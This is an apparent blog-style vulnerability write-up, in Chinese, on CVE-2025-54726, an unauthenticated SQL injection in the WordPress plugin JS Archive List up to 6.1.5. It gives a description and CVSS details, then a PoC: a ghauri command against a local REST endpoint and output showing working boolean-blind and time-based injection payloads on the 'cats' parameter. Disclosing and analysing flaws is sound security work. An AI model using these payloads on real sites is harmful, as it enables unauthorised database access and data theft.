WordPress JS Archive List插件SQL注入漏洞分析(CVE-2025-54726)

本文详细分析了WordPress插件JS Archive List 6.1.5及以下版本中存在的未授权SQL注入漏洞CVE-2025-54726。漏洞由于对用户输入参数过滤不严及SQL查询缺乏充分准备导致,攻击者可利用此漏洞提取数据库敏感信息。文章包含完整的漏洞描述、技术细节和PoC验证过程。

CVE-2025-54726

JS Archive List <= 6.1.5 - 未授权SQL注入漏洞

漏洞描述

WordPress的JS Archive List插件在所有6.1.5及以下版本中存在SQL注入漏洞,该漏洞由于对用户提供的参数转义不足以及现有SQL查询缺乏充分准备导致。这使得未授权攻击者能够向现有查询中附加额外的SQL查询,从而用于从数据库中提取敏感信息。

技术细节

  • 类型: 插件漏洞
  • 插件标识: jquery-archive-list-widget
  • 受影响版本: 6.1.5
  • CVSS评分: 7.5
  • CVSS等级: 高危
  • CVSS向量: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • CVE编号: CVE-2025-54726
  • 状态: 活跃

PoC验证

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
ghauri -u "http://localhost/wp-json/jalw/v1/archive?cats=1&exclusionType=exclude"

  ________.__                        .__  {1.4.1}
 /  _____/|  |__ _____   __ _________|__|
/   \  ___|  |  \\__  \ |  |  \_  __ \  |
\    \_\  \   Y  \/ __ \|  |  /|  | \/  |
 \______  /___|  (____  /____/ |__|  |__|
        \/     \/     \/         https://github.com/r0oth3x49
                                 An advanced SQL injection detection & exploitation tool.

[*] 开始时间: 16:39:05 /2025-09-25/

[16:39:05] [INFO] 测试与目标URL的连接
Ghauri从存储的会话中恢复以下注入点:
---
参数: cats (GET)
    类型: 基于布尔的盲注
    标题: AND布尔盲注 - WHERE或HAVING子句
    载荷: cats=1 AND 01609=1609&exclusionType=exclude

    类型: 基于时间的盲注
    标题: MySQL >= 5.0.12时间盲注 (IF - 注释)
    载荷: cats=if(now()=sysdate(),SLEEP(5),0)&exclusionType=exclude
---
[16:39:05] [INFO] 测试MySQL
[16:39:05] [INFO] 确认MySQL
[16:39:06] [INFO] 后端数据库管理系统为MySQL
comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计